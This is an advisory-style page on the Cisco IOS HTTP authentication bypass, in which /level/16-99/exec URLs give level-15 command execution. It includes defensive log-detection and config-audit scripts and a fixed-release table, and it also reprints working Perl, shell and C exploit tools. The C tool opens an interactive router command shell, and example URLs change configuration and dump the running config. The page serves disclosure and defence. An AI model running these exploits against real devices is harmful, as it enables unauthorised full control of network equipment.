COMMAND

    CISCO

SYSTEMS AFFECTED

    Cisco IOS 11.3 and later

PROBLEM

    The following is based on a Cisco Security Advisory.  When the HTTP
    server is enabled and local authorization is used, it is possible,
    under some circumstances, to bypass the authentication and execute
    any command on the device.  In that case, the user will be able to
    exercise complete control over the device.  All commands will be
    executed with the highest privilege (level 15).

    All releases of Cisco IOS software, starting with release 11.3,
    are vulnerable.  Virtually all mainstream Cisco routers and
    switches running Cisco IOS are affected by this vulnerability.

    By sending a crafted URL  it is possible to bypass  authentication
    and execute any command on  the router at level 15  (enable level,
    the most privileged level).  This will happen only if the user  is
    using a local database for authentication (usernames and passwords
    are defined  on the  device itself).   The same  URL will  not  be
    effective against  every Cisco  IOS software  release and hardware
    combination.   However, there  are only  84 different combinations
    to try, so it would be easy for an attacker to test them all in  a
    short period of time.  The URL in question follows this format:

        http://<device_address>/level/xx/exec/....

    Where xx is  a number between  16 and 99.   This vulnerability  is
    documented as Cisco Bug ID CSCdt93862.
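
    Added example, not part of the advisory: since level 15 is the
    highest privilege level, a request path carrying a level of 16 or
    more is never legitimate, and HTTP logs can be searched for it.
    The log format (Common Log Format from a proxy or sensor in front
    of the management interface), the addresses and the sweep
    threshold are assumptions; the sample lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample log (documentation address ranges, made-up timestamps).
SAMPLE_LOG = """\
192.0.2.10 - - [29/Jun/2001:00:59:40 +0000] "GET /level/15/exec/show/version HTTP/1.0" 401 0
192.0.2.200 - - [29/Jun/2001:00:59:41 +0000] "GET /level/99/exec/- HTTP/1.0" 401 0
192.0.2.77 - - [29/Jun/2001:00:59:42 +0000] "GET /level/16/exec/- HTTP/1.0" 401 0
192.0.2.77 - - [29/Jun/2001:00:59:42 +0000] "GET /level/17/exec/- HTTP/1.0" 401 0
192.0.2.77 - - [29/Jun/2001:00:59:43 +0000] "GET /level/18/exec/- HTTP/1.0" 401 0
198.51.100.7 - - [29/Jun/2001:00:59:44 +0000] "GET /level/16/exec/- HTTP/1.0" 401 0
198.51.100.7 - - [29/Jun/2001:00:59:44 +0000] "GET /level/17/exec/- HTTP/1.0" 401 0
198.51.100.7 - - [29/Jun/2001:00:59:45 +0000] "GET /level/18/exec/- HTTP/1.0" 200 512
198.51.100.7 - - [29/Jun/2001:00:59:50 +0000] "GET /level/18/exec/show%20conf HTTP/1.0" 200 4096
203.0.113.5 - - [29/Jun/2001:01:02:03 +0000] "GET /LEVEL/42/configure/-/banner/motd/LINE HTTP/1.0" 200 128
192.0.2.10 - - [29/Jun/2001:01:05:00 +0000] "GET /index.html HTTP/1.0" 200 900
"""

MAX_VALID_LEVEL = 15   # highest real privilege level, per the advisory
SWEEP_THRESHOLD = 3    # assumption: distinct bad levels that count as a sweep

CLF = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})\b'
)
# Matched case-insensitively to stay conservative about server path handling.
LEVEL_PATH = re.compile(r'^/level/(\d{1,3})/(exec|configure)(?:/|$)', re.IGNORECASE)


def classify(line):
    """Return a dict for a request with an out-of-range level, else None."""
    m = CLF.match(line)
    if not m:
        return None
    # Drop any query string, then percent-decode so %20 and friends compare.
    path = unquote(m.group("path").split("?", 1)[0])
    lp = LEVEL_PATH.match(path)
    if not lp:
        return None
    level = int(lp.group(1))
    if level <= MAX_VALID_LEVEL:
        return None
    return {
        "src": m.group("src"),
        "level": level,
        "mode": lp.group(2).lower(),
        "status": int(m.group("status")),
        "path": path,
    }


def analyse(log_text):
    """Group hits by source and grade them.

    bypass-accepted: a 200 was returned for an out-of-range level
    level-sweep:     several distinct levels tried, none accepted
    probe:           isolated request(s), none accepted
    """
    per_src = defaultdict(lambda: {"levels": set(), "accepted": []})
    for line in log_text.splitlines():
        hit = classify(line)
        if hit is None:
            continue
        entry = per_src[hit["src"]]
        entry["levels"].add(hit["level"])
        if hit["status"] == 200:
            entry["accepted"].append(hit["path"])

    findings = []
    for src in sorted(per_src):
        entry = per_src[src]
        if entry["accepted"]:
            verdict = "bypass-accepted"
        elif len(entry["levels"]) >= SWEEP_THRESHOLD:
            verdict = "level-sweep"
        else:
            verdict = "probe"
        findings.append((src, verdict, sorted(entry["levels"]), entry["accepted"]))
    return findings


if __name__ == "__main__":
    for src, verdict, levels, accepted in analyse(SAMPLE_LOG):
        print(f"{src:15} {verdict:16} levels={levels} accepted={accepted}")
```

    A "bypass-accepted" verdict means the device answered 200 to a
    level that does not exist, which is the same condition the check
    scripts on this page treat as vulnerable.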

    An attacker  can exercise  complete control  over the  device.  By
    exploiting this  vulnerability, the  attacker can  see and  change
    configuration of the device.

    You can also run configuration commands:

        http://169.254.0.15/level/42/configure/-/banner/motd/LINE

    Start  with  http://169.254.0.16/level/xx/configure  and  go  from
    there.  A malicious user could use:

        http://169.254.0.15/level/42/exec/show%20conf

    to get, for instance, vty 0 4 acl information and then add an  ACL
    for his/her source ip.

    This vulnerability has been reported to us independently by  David
    Hyams, Ernst & Young, Switzerland and by Bashis.

    Tamer Sahin wrote an MS-based exploit for the Cisco IOS HTTP
    vulnerability:

        http://www.tamersahin.net/downloads/cisco_ios.zip

    Ertan Kurt provided the working code below:

    #!/usr/bin/perl
    # modified roelof's uni.pl
    # to check cisco ios http auth bug
    # cronos <cronos@olympos.org>
    use Socket;
    print "enter IP (x.x.x.x): ";
    $host= <STDIN>;
    chop($host);
    $i=16;
    $port=80;
    $target = inet_aton($host);
    $flag=0;
    LINE: while ($i<100) {
    # ------------- Sendraw - thanx RFP rfp@wiretrip.net
    my @results=sendraw("GET /level/".$i."/exec/- HTTP/1.0\r\n\r\n");
    foreach $line (@results){
            $line=~ tr/A-Z/a-z/;
            if ($line =~ /http\/1\.0 401 unauthorized/) {$flag=1;}
            if ($line =~ /http\/1\.0 200 ok/) {$flag=0;}
    }
            if ($flag==1){print "Not Vulnerable with $i\n\r";}
                    else {print "$line Vulnerable with $i\n\r"; last LINE; }
            $i++;
    sub sendraw {
            my ($pstr)=@_;
            socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                    die("Socket problems\n");
            if(connect(S,pack "SnA4x8",2,$port,$target)){
                    my @in;
                    select(S);      $|=1;   print $pstr;
                    while(<S>){ push @in, $_;}
                    select(STDOUT); close(S); return @in;
            } else { die("Can't connect...\n"); }
    }
    }

    This is a little cleaner than the Perl script above:

    #!/bin/sh
    #=============================================================================
    # $Id: ios-http-auth.sh,v 1.1 2001/06/29 00:59:44 root Exp root $
    #
    # Brute force IOS HTTP authorization vulnerability (Cisco Bug ID CSCdt93862).
    #=============================================================================
    TARGET=192.168.10.20
    FETCH="/usr/bin/fetch"

    LEVEL=16                  # Start Level
    EXPLOITABLE=0             # Counter

    while [ $LEVEL -lt 100 ]; do
        CMD="${FETCH} http://${TARGET}/level/${LEVEL}/exec/show/config"
        echo; echo ${CMD}
        if (${CMD}) then
            EXPLOITABLE=`expr ${EXPLOITABLE} + 1`
        fi
        LEVEL=`expr $LEVEL + 1`
    done;

    echo; echo All done
    echo "${EXPLOITABLE} exploitable levels"

    Eliel Sardanons added the following:

    /* Coded and backdored by Eliel C. Sardanons <eliel.sardanons@philips.edu.ar>
     * to compile:
     * bash# gcc -o cisco cisco.c
     */
    
    #include <stdio.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    
    #define HTTP_PORT 80
    #define PROMPT "\ncisco$ "
    
    int usage (char *progname) {
	    printf ("Usage:\n\t%s server\n", progname);
	    exit(-1);
    }
    
    int main (int argc, char *argv[]) {
	    struct hostent *he;
	    struct sockaddr_in sin;
	    int sck, i=0, number=0;
	    char command[256], buffer[512];
	    if (argc < 2)
		    usage(argv[0]);
	    if ((he = gethostbyname(argv[1])) == NULL) {
		    perror("host()");
		    exit(-1);
	    }
	    sin.sin_family = AF_INET;
	    sin.sin_port = htons(HTTP_PORT);
	    sin.sin_addr = *((struct in_addr *)he->h_addr);
	    printf ("Checking Numbers /level/xx/exec\n");
	    i=15;
	    while (1) {
		    i++;
		    if (i > 99) {
			    printf ("Server not vulnerable\n");
			    exit(-1);
		    }
		    if ((sck = socket (AF_INET, SOCK_STREAM, 6)) <= 0) {
			          perror("socket()");
			          exit(-1);
		    }
		    if ((connect(sck, (struct sockaddr *)&sin, sizeof(sin))) < 0) {
			    perror ("connect()");
			    exit(-1);
		    }
		    sprintf (buffer, "GET /level/%d/exec HTTP/1.0\r\n\r\n");
		    write (sck, buffer, strlen(buffer));
		    memset (buffer, 0, sizeof(buffer));
		    read (sck, buffer, sizeof(buffer));
		    if ((strstr(buffer, "Unauthorized")) == 0 && strlen(buffer) > 5)
			    break;
	    }
	    number = i;
	    printf ("Found: %d\n", number);
	    while (1) {
		    if ((sck = socket (AF_INET, SOCK_STREAM, 6)) <= 0) {
			    perror("socket()");
			    exit(-1);
		    }
		    if ((connect(sck, (struct sockaddr *)&sin, sizeof(sin))) < 0) {
			    perror ("connect()");
			    exit(-1);
		    }
		    printf (PROMPT);
		    fgets (command, 256, stdin);
		    if (strlen(command) == 1)
			    break;
		    for (i=0;i<strlen(command);i++) {
			    if (command[i] == ' ')
				    command[i] = '/';
		    }
		    snprintf (buffer, sizeof(buffer),
							    "GET /level/%d/exec/%s HTTP/1.0\r\n\r\n", number, command);
		    write (sck, buffer, strlen(buffer));
		    memset (buffer, 0, sizeof(buffer));
		    while ((read (sck, buffer, sizeof(buffer))) != 0) {
			    if ((strstr(buffer, "CR</A>")) != 0) {
				    printf ("You need to complete the command with more parameters or finish the command with 'CR'\n");
				    memset (buffer, 0, sizeof(buffer));
				    break;
			    } else if ((strstr(buffer, "Unauthorized")) != 0) {
				    printf ("Server not vulnerable\n");
				    exit(-1);
			    } else {
				    printf ("%s", buffer);
				    memset (buffer, 0, sizeof(buffer));
			    }
		     }
	    }
	    printf ("Thanks...\n");
	    exit(0);
    }

SOLUTION

    The workaround for this vulnerability is to disable the HTTP server
    on the router or to use Terminal Access Controller Access Control
    System (TACACS+) or RADIUS for authentication.  Fixes are listed in
    the table below.
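
    Added example, not part of the advisory: a check of saved device
    configurations for the condition described above (HTTP server on,
    local authentication).  It assumes the IOS statements
    "ip http server" and "ip http authentication <method>", treats the
    last statement seen as the effective one, and reports "unknown"
    when no "ip http server" statement is present because the default
    is not stated here.  Hostnames and config excerpts are constructed.

```python
import re

# Constructed running-config excerpts (hostnames and contents are made up).
CONFIGS = {
    "edge-rtr-1": """\
hostname edge-rtr-1
username admin password 7 <redacted>
ip http server
ip http authentication local
""",
    "core-sw-2": """\
hostname core-sw-2
ip http server
ip http authentication tacacs
""",
    "branch-rtr-3": """\
hostname branch-rtr-3
ip http server
ip http authentication local
!
no ip http server
""",
    "lab-rtr-4": """\
hostname lab-rtr-4
interface Ethernet0
 ip address 192.0.2.1 255.255.255.0
""",
}

HTTP_SERVER = re.compile(r'^(no\s+)?ip\s+http\s+server\s*$', re.IGNORECASE)
HTTP_AUTH = re.compile(
    r'^(no\s+)?ip\s+http\s+authentication(?:\s+(\S+))?', re.IGNORECASE
)


def audit_config(text):
    """Return (server_state, auth_method, verdict) for one configuration.

    server_state: True, False, or None when no statement was seen
    auth_method:  lower-cased method name, or None for the device default
    verdict:      "exposed", "nonlocal-auth", "disabled" or "unknown"
    """
    server = None
    auth = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("!"):
            continue  # blank line or IOS comment/separator
        m = HTTP_SERVER.match(line)
        if m:
            server = m.group(1) is None  # a leading "no" disables the server
            continue
        m = HTTP_AUTH.match(line)
        if m:
            # "no ip http authentication ..." falls back to the default method
            auth = None if m.group(1) else ((m.group(2) or "").lower() or None)

    if server is False:
        verdict = "disabled"        # first workaround from the advisory
    elif server is None:
        verdict = "unknown"         # no statement: needs a manual check
    elif auth == "local":
        verdict = "exposed"         # HTTP on + local user database
    else:
        verdict = "nonlocal-auth"   # HTTP on, but not the local database
    return server, auth, verdict


def audit_fleet(configs):
    """Map hostname -> verdict for a dict of hostname -> config text."""
    return {host: audit_config(text)[2] for host, text in configs.items()}


def exposed_hosts(configs):
    """Sorted hostnames that match the vulnerable condition."""
    return sorted(h for h, v in audit_fleet(configs).items() if v == "exposed")


if __name__ == "__main__":
    for host, verdict in sorted(audit_fleet(CONFIGS).items()):
        print(f"{host:14} {verdict}")
```

    Hosts reported as "exposed" still need the fixed release from the
    table; the configuration change is only the workaround.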

    +---------------+----------------+-----------------------------------------+
    |               | Description of |                                         |
    |    Train      |    Image or    |      Availability of Fixed Releases*    |
    |               |    Platform    |                                         |
    +---------------+----------------+-------------+------------+--------------+
    |11.0-based Releases and Earlier |   Rebuild   | Interim**  |  Maintenance |
    +---------------+----------------+-------------+------------+--------------+
    |               |Multiple        |                                         |
    |     10.3      |releases and    |Not affected                             |
    |               |platforms       |                                         |
    +---------------+----------------+-----------------------------------------+
    |               |Multiple        |                                         |
    |     11.0      |releases and    |Not affected                             |
    |               |platforms       |                                         |
    +---------------+----------------+-------------+------------+--------------+
    |      11.1-based Releases       |   Rebuild   | Interim**  |  Maintenance |
    +---------------+----------------+-------------+------------+--------------+
    |               |Major release   |                                         |
    |     11.1      |for all         |Not affected                             |
    |               |platforms       |                                         |
    +---------------+----------------+-------------+------------+--------------+
    |      11.2-based Releases       |   Rebuild   | Interim**  |  Maintenance |
    +---------------+----------------+-------------+------------+--------------+
    |               |Major release   |End of Engineering                       |
    |     11.2      |for all         +-----------------------------------------+
    |               |platforms       |Not affected                             |
    +---------------+----------------+-------------+------------+--------------+
    |      11.3-based Releases       |   Rebuild   | Interim**  |  Maintenance |
    +---------------+----------------+-------------+------------+--------------+
    |               |Major release   |End of Engineering                       |
    |     11.3      |for all         +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.0(18)          |
    +---------------+----------------+-----------------------------------------+
    |               |ED for dial     |                                         |
    |               |platforms and   |Not Scheduled                            |
    |    11.3AA     |access servers  +-----------------------------------------+
    |               |5800, 5200,     |Upgrade recommended to 12.1(9)           |
    |               |5300, 7200      |                                         |
    +---------------+----------------+-----------------------------------------+
    |               |Early deployment|End of Engineering                       |
    |    11.3DA     |train for ISP   |                                         |
    |               |DSLAM 6200      +-----------------------------------------+
    |               |platform        |Upgrade recommended to 12.1DA            |
    +---------------+----------------+-----------------------------------------+
    |               |Early deployment|                                         |
    |               |train for       |End of Engineering                       |
    |               |ISP/Telco/PTT   |                                         |
    |    11.3DB     |xDSL broadband  +-----------------------------------------+
    |               |concentrator    |                                         |
    |               |platform, (NRP) |Upgrade recommended to 12.1DB            |
    |               |for 6400        |                                         |
    +---------------+----------------+-----------------------------------------+
    |               |Short-lived ED  |End of Engineering                       |
    |    11.3HA     |release for ISR |                                         |
    |               |3300 (SONET/SDH +-----------------------------------------+
    |               |router)         |Upgrade recommended to 12.0(18)          |
    +---------------+----------------+-----------------------------------------+
    |               |MC3810          |End of Engineering                       |
    |    11.3MA     |functionality   +-----------------------------------------+
    |               |only            |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Voice over IP,  |                                         |
    |               |media           |End of Engineering                       |
    |    11.3NA     |convergence,    +-----------------------------------------+
    |               |various         |Upgrade recommended to 12.1(9)           |
    |               |platforms       |                                         |
    +---------------+----------------+-----------------------------------------+
    |               |Early deployment|End of Engineering                       |
    |    11.3T      |major release,  |                                         |
    |               |feature-rich for+-----------------------------------------+
    |               |early adopters  |Upgrade recommended to 12.0(18)          |
    +---------------+----------------+-----------------------------------------+
    |               |                |End of Engineering                       |
    |    11.3XA     |Introduction of +-----------------------------------------+
    |               |ubr7246 and 2600|Upgrade recommended to 12.0(18)          |
    +---------------+----------------+-----------------------------------------+
    |               |                |End of Engineering                       |
    |   11.3WA4     |LightStream 1010+-----------------------------------------+
    |               |                |Upgrade to be determined                 |
    +---------------+----------------+-------------+------------+--------------+
    |      12.0-based Releases       |   Rebuild   | Interim**  |  Maintenance |
    +---------------+----------------+-------------+------------+--------------+
    |               |General         |             |            |              |
    |     12.0      |Deployment      |             |            |12.0(18)      |
    |               |release for all |             |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |                |Not Scheduled                            |
    |    12.0DA     |xDSL support    +-----------------------------------------+
    |               |6100, 6200      |Upgrade recommended to 12.1(7)DA2        |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|                                         |
    |               |(ED) release,   |                                         |
    |               |which delivers  |Not Scheduled                            |
    |               |support for the |                                         |
    |    12.0DB     |Cisco 6400      +-----------------------------------------+
    |               |Universal Access|                                         |
    |               |Concentrator    |                                         |
    |               |(UAC) for Node  |Upgrade recommended to 12.1(5)DB2        |
    |               |Switch Processor|                                         |
    |               |(NSP).          |                                         |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|                                         |
    |               |(ED) release,   |                                         |
    |               |which delivers  |Not Scheduled                            |
    |               |support for the |                                         |
    |    12.0DC     |Cisco 6400      +-----------------------------------------+
    |               |Universal Access|                                         |
    |               |Concentrator    |                                         |
    |               |(UAC) for Node  |Upgrade recommended to 12.1DC            |
    |               |Switch Processor|                                         |
    |               |(NSP).          |                                         |
    +---------------+----------------+-------------+------------+--------------+
    |               |Core/ISP        |             |            |12.0(18)S     |
    |    12.0S      |support GSR,    |             |            |Available     |
    |               |RSP, c7200      |             |            |2001-July     |
    +---------------+----------------+-------------+------------+--------------+
    |    12.0SC     |Cable/broadband |             |            |12.0(16)SC    |
    |               |ISP ubr7200     |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |    12.0SL     |10000 ESR c10k  |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Cisco IOS       |             |            |              |
    |               |software        |             |            |              |
    |               |Release12.0ST is|             |            |              |
    |               |an early        |             |            |              |
    |               |deployment (ED) |             |            |              |
    |               |release for the |             |            |              |
    |    12.0ST     |Cisco 7200,     |             |            |              |
    |               |7500/7000RSP and|             |            |              |
    |               |12000 (GSR)     |             |            |              |
    |               |series routers  |             |            |              |
    |               |for Service     |             |            |              |
    |               |Providers       |             |            |              |
    |               |(ISPs).         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early           |                                         |
    |               |Deployment(ED)  |Not Scheduled                            |
    |    12.0T      |VPN, Distributed|                                         |
    |               |Director,       +-----------------------------------------+
    |               |various         |Upgrade recommended to 12.1(9)           |
    |               |platforms       |                                         |
    +---------------+----------------+-----------------------------------------+
    |               |Catalyst        |                                         |
    |               |switches        |                                         |
    |               |cat8510c,       |                                         |
    |12.0(13)W5(19c)|cat8540c, c6msm,|Not vulnerable                           |
    |               |ls1010,         |                                         |
    |               |cat8510m,       |                                         |
    |               |cat8540m        |                                         |
    +---------------+----------------+-------------+------------+--------------+
    |               |Catalyst        |             |            |              |
    |12.0(10)W5(18g)|switches        |             |            |12.0(18)W5(22a)
    |               |cat2948g,       |             |            |2001-August-23|
    |               |cat4232         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Catalyst        |             |            |              |
    |12.0(14)W5(20) |switches        |             |            |12.0(18)W5(22)|
    |               |cat5000ATM      |             |            |2001-August-03|
    +---------------+----------------+-------------+------------+--------------+
    |               |                |Not Scheduled                            |
    |    12.0WC     |                +-----------------------------------------+
    |               |                |Upgrade to be determined                 |
    +---------------+----------------+-----------------------------------------+
    |               |                |Not Scheduled                            |
    |    12.0WT     |cat4840g        +-----------------------------------------+
    |               |                |Upgrade to be determined                 |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XA     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Short-lived     |Not Scheduled                            |
    |    12.0XB     |early deployment+-----------------------------------------+
    |               |release         |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XC     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XD     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XE     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(8a)E         |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XF     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XG     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XH     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XI     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XJ     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |  12.0(5)XK    |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |  12.0(7)XK    |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.2              |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XL     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XM     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.0(4)XM1        |
    |               |                |Availability date to be determined       |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XN     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XP     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade to be determined                 |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XQ     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(9)           |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XR     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.2(1b)          |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|End of Engineering                       |
    |    12.0XS     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(8a)E         |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XU     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade to be determined                 |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.0XV     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade to be determined                 |
    +---------------+----------------+-------------+------------+--------------+
    |      12.1-based Releases       |   Rebuild   | Interim**  |  Maintenance |
    +---------------+----------------+-------------+------------+--------------+
    |               |General         |             |            |              |
    |     12.1      |deployment      |             |            |12.1(9)       |
    |               |release for all |             |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |    12.1AA     |Dial support    |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Core/ISP        |             |            |              |
    |    12.1CX     |support GSR,    |             |            |              |
    |               |RSP, c7200      |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |    12.1DA     |xDSL support    |12.1(7)DA2   |            |              |
    |               |6100, 6200      |2001-Jun-18  |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Cisco IOS       |             |            |              |
    |               |Software Release|             |            |              |
    |               |12.1(1)DB       |             |            |              |
    |    12.1DB     |supports Cisco's|             |            |              |
    |               |6400 Universal  |             |            |              |
    |               |Access          |             |            |              |
    |               |Concentrator    |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Cisco IOS       |             |            |              |
    |               |Software Release|             |            |              |
    |               |12.1(1)DC       |             |            |              |
    |    12.1DC     |supports Cisco's|             |            |              |
    |               |6400 Universal  |             |            |              |
    |               |Access          |             |            |              |
    |               |Concentrator    |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Core/ISP        |             |            |              |
    |    12.1E      |support GSR,    |             |            |12.1(8a)E     |
    |               |RSP, c7200      |             |            |2001-Jul-09   |
    +---------------+----------------+-------------+------------+--------------+
    |               |12.1EC is being |             |            |              |
    |               |offered to allow|             |            |              |
    |               |early support of|             |            |              |
    |               |new features on |             |            |              |
    |               |the uBR7200     |             |            |              |
    |    12.1EC     |platform, as    |             |12.1(6.5)EC3|              |
    |               |well as future  |             |            |              |
    |               |support for new |             |            |              |
    |               |Universal       |             |            |              |
    |               |Broadband Router|             |            |              |
    |               |headend         |             |            |              |
    |               |platforms.      |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |    12.1EX     |Catalyst 6000   |             |            |12.1(8a)E     |
    |               |support         |             |            |2001-Jul-09   |
    +---------------+----------------+-------------+------------+--------------+
    |               |Cat8510c,       |             |            |              |
    |    12.1EY     |Cat8510m,       |             |            |12.1(6)EY     |
    |               |Cat8540c,       |             |            |              |
    |               |Cat8540m, LS1010|             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1EZ     |(ED) special    |12.1(6)EZ1   |            |              |
    |               |image           |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early           |                                         |
    |               |Deployment (ED) |Not Scheduled                            |
    |    12.1T      |VPN, Distributed|                                         |
    |               |Director,       +-----------------------------------------+
    |               |various         |Upgrade recommended to 12.2(1b)          |
    |               |platforms       |                                         |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XA     |(ED) limited    |             |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XB     |(ED) limited    |             |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XC     |(ED) limited    |             |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.1XD     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.2(1b)          |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XE     |(ED) limited    |             |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XF     |(ED) 811 and    |12.1(2)XF4   |            |              |
    |               |813 (c800       |2001-July-09 |            |              |
    |               |images)         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XG     |(ED) 800, 805,  |12.1(5)XG5   |            |              |
    |               |820, and 1600   |2001-July-09 |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.1XH     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.2(1b)          |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.1XI     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.2(1b)          |
    +---------------+----------------+-----------------------------------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.1XJ     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.1(5)YB4        |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XK     |(ED) limited    |             |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|Not Scheduled                            |
    |    12.1XL     |(ED) limited    +-----------------------------------------+
    |               |platforms       |Upgrade recommended to 12.2(1b)          |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1XM     |early deployment|12.1(4)XM4   |            |              |
    |               |release         |2001-June-27 |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XP     |(ED) 1700 and   |12.1(3)XP4   |            |              |
    |               |SOHO            |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |Not Scheduled                            |
    |    12.1XQ     |early deployment+-----------------------------------------+
    |               |release         |Upgrade recommended to 12.2(1b)          |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1XR     |early deployment|12.1(5)XR2   |            |              |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1XS     |early deployment|             |            |              |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XT     |(ED) 1700       |12.1(3)XT3   |            |              |
